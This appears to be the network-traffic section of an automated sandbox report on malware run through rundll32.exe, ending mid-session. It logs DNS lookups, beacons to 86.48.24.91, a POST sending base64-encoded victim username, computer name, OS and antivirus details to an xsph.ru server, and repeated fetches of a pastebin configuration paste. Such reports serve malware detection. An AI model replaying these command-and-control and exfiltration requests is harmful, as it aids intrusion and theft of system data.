          Dec 4, 2022 22:28:01.273149014 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:01.275274992 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:01.275674105 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:01.281678915 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.167366982 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.178674936 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.183940887 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.188121080 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.195415020 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.196114063 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.204494953 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.206274986 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.223551989 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.224152088 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.233273983 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.236186028 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.243490934 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.246165037 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.251768112 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.255625963 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:05.322439909 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.332484961 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.339231014 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.348261118 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.367412090 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.379220009 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.389286041 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:05.398247004 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.261871099 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.271408081 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.277549982 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.277873039 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.288060904 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.288407087 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.300491095 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.300904989 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.312695980 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.312966108 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.324084044 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.324409962 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.337204933 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.337762117 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.349472046 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.349740028 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:10.415174007 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.420130968 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.436369896 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.444051027 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.455344915 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.467101097 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.480278015 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:10.493057966 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.367940903 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.375041962 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.379865885 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.380580902 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.401374102 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.402004004 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.411201000 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.411550999 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.419774055 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.420272112 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.426450014 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.427290916 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.434765100 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.436386108 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.447767973 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.448040009 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:15.517059088 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.522890091 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.544987917 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.554032087 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.565538883 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.570331097 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.577994108 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:15.591010094 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.459330082 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.473141909 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.477942944 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.478334904 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.490041018 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.494342089 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.507363081 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.509103060 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.522454023 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.524458885 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.535546064 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.536318064 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.549942970 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.550316095 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.564479113 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.569183111 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:20.615978956 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.620826960 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.637028933 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.651937962 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.667117119 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.678930044 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.693097115 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:20.714397907 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.579235077 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.584759951 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.590564013 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.592194080 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.604134083 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.604873896 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.612883091 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.613368034 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.621367931 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.621857882 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.635809898 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.637871027 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.649156094 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.653865099 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.668791056 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.670777082 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:25.726967096 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.734572887 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.755867958 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.757509947 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.766232014 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.781759024 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.797764063 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:25.814966917 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.680212975 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.693924904 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.703696012 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.713514090 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.722382069 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.725764990 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.734493017 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.737092018 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.743896008 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.749481916 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.753397942 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.758471966 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:30.762763023 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.775930882 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.793037891 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:30.801476002 CET497292000192.168.2.386.48.24.91
          TimestampSource PortDest PortSource IPDest IP
          Dec 4, 2022 22:24:29.515820980 CET5784053192.168.2.38.8.8.8
          Dec 4, 2022 22:24:29.557092905 CET53578408.8.8.8192.168.2.3
          Dec 4, 2022 22:24:30.445106030 CET5799053192.168.2.38.8.8.8
          Dec 4, 2022 22:24:30.467135906 CET53579908.8.8.8192.168.2.3
          Dec 4, 2022 22:24:30.934822083 CET5238753192.168.2.38.8.8.8
          Dec 4, 2022 22:24:30.956899881 CET53523878.8.8.8192.168.2.3
          Dec 4, 2022 22:24:34.722403049 CET5692453192.168.2.38.8.8.8
          Dec 4, 2022 22:24:34.741597891 CET53569248.8.8.8192.168.2.3
          Dec 4, 2022 22:25:05.461997986 CET5397553192.168.2.38.8.8.8
          Dec 4, 2022 22:25:05.481703043 CET53539758.8.8.8192.168.2.3
          Dec 4, 2022 22:25:06.750123978 CET5113953192.168.2.38.8.8.8
          Dec 4, 2022 22:25:06.772469044 CET53511398.8.8.8192.168.2.3
          Dec 4, 2022 22:25:07.594399929 CET5295553192.168.2.38.8.8.8
          Dec 4, 2022 22:25:07.613972902 CET53529558.8.8.8192.168.2.3
          Dec 4, 2022 22:25:08.147825003 CET6058253192.168.2.38.8.8.8
          Dec 4, 2022 22:25:08.169115067 CET53605828.8.8.8192.168.2.3
          Dec 4, 2022 22:25:09.374255896 CET5713453192.168.2.38.8.8.8
          Dec 4, 2022 22:25:09.393791914 CET53571348.8.8.8192.168.2.3
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 4, 2022 22:24:29.515820980 CET192.168.2.38.8.8.80x2d37Standard query (0)a0747694.xsph.ruA (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.445106030 CET192.168.2.38.8.8.80x2ca7Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.934822083 CET192.168.2.38.8.8.80x89e6Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:34.722403049 CET192.168.2.38.8.8.80x15cfStandard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:05.461997986 CET192.168.2.38.8.8.80x9252Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:06.750123978 CET192.168.2.38.8.8.80x56c1Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:07.594399929 CET192.168.2.38.8.8.80xc120Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:08.147825003 CET192.168.2.38.8.8.80x9036Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:09.374255896 CET192.168.2.38.8.8.80xbdd5Standard query (0)pastebin.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 4, 2022 22:24:29.557092905 CET8.8.8.8192.168.2.30x2d37No error (0)a0747694.xsph.ru141.8.197.42A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.467135906 CET8.8.8.8192.168.2.30x2ca7No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.467135906 CET8.8.8.8192.168.2.30x2ca7No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.467135906 CET8.8.8.8192.168.2.30x2ca7No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.956899881 CET8.8.8.8192.168.2.30x89e6No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.956899881 CET8.8.8.8192.168.2.30x89e6No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:30.956899881 CET8.8.8.8192.168.2.30x89e6No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:34.741597891 CET8.8.8.8192.168.2.30x15cfNo error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:34.741597891 CET8.8.8.8192.168.2.30x15cfNo error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:24:34.741597891 CET8.8.8.8192.168.2.30x15cfNo error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:05.481703043 CET8.8.8.8192.168.2.30x9252No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:05.481703043 CET8.8.8.8192.168.2.30x9252No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:05.481703043 CET8.8.8.8192.168.2.30x9252No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:06.772469044 CET8.8.8.8192.168.2.30x56c1No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:06.772469044 CET8.8.8.8192.168.2.30x56c1No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:06.772469044 CET8.8.8.8192.168.2.30x56c1No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:07.613972902 CET8.8.8.8192.168.2.30xc120No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:07.613972902 CET8.8.8.8192.168.2.30xc120No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:07.613972902 CET8.8.8.8192.168.2.30xc120No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:08.169115067 CET8.8.8.8192.168.2.30x9036No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:08.169115067 CET8.8.8.8192.168.2.30x9036No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:08.169115067 CET8.8.8.8192.168.2.30x9036No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:09.393791914 CET8.8.8.8192.168.2.30xbdd5No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:09.393791914 CET8.8.8.8192.168.2.30xbdd5No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
          Dec 4, 2022 22:25:09.393791914 CET8.8.8.8192.168.2.30xbdd5No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
          • pastebin.com
          • a0747694.xsph.ru
          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.349707172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.349706172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          2192.168.2.349710172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          3192.168.2.349720104.20.68.143443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          4192.168.2.349721104.20.67.143443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          5192.168.2.349722172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          6192.168.2.349724172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          7192.168.2.349726104.20.68.143443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData


          Session IDSource IPSource PortDestination IPDestination PortProcess
          8192.168.2.349705141.8.197.4280C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          Dec 4, 2022 22:24:29.608438969 CET104OUTPOST /serv.php HTTP/1.0
          Connection: keep-alive
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 153
          Host: a0747694.xsph.ru
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          User-Agent: Mozilla/3.0 (compatible; Indy Library)
          Dec 4, 2022 22:24:29.657469034 CET105OUTData Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 61 47 46 79 5a 48 6f 26 63 6e 61 6d 65 3d 4d 54 49 34 4e 7a 55 33 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48 4a 76 49 44
          Data Ascii: vv=10&vw=&mods=&uname=aGFyZHo&cname=MTI4NzU3&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iss=YWFhYWE&iav=V2luZG93cyBEZWZlbmRlcg
          Dec 4, 2022 22:24:29.707089901 CET105INHTTP/1.1 400 Bad Request
          Server: openresty
          Date: Sun, 04 Dec 2022 21:24:29 GMT
          Content-Type: text/html
          Content-Length: 154
          Connection: close
          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.349707172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:24:31 UTC0OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:24:32 UTC0INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:24:32 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: MISS
          Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT
          Server: cloudflare
          CF-RAY: 77479c006d489199-FRA
          2022-12-04 21:24:32 UTC1INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:24:32 UTC1INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.349706172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:24:31 UTC0OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:24:32 UTC0INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:24:32 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: MISS
          Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT
          Server: cloudflare
          CF-RAY: 77479c03c957bb9e-FRA
          2022-12-04 21:24:32 UTC0INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:24:32 UTC0INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          2192.168.2.349710172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:24:45 UTC1OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:24:45 UTC1INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:24:45 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: HIT
          Age: 13
          Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT
          Server: cloudflare
          CF-RAY: 77479c570d9b9b88-FRA
          2022-12-04 21:24:45 UTC1INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:24:45 UTC1INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          3192.168.2.349720104.20.68.143443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:25:06 UTC1OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:25:06 UTC2INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:25:06 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: MISS
          Last-Modified: Sun, 04 Dec 2022 21:25:06 GMT
          Server: cloudflare
          CF-RAY: 77479cdc2ea2bb3b-FRA
          2022-12-04 21:25:06 UTC2INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:25:06 UTC2INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          4192.168.2.349721104.20.67.143443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:25:08 UTC2OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:25:08 UTC2INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:25:08 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: MISS
          Last-Modified: Sun, 04 Dec 2022 21:25:08 GMT
          Server: cloudflare
          CF-RAY: 77479ce539929975-FRA
          2022-12-04 21:25:08 UTC3INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:25:08 UTC3INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          5192.168.2.349722172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:25:10 UTC3OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:25:10 UTC3INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:25:10 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
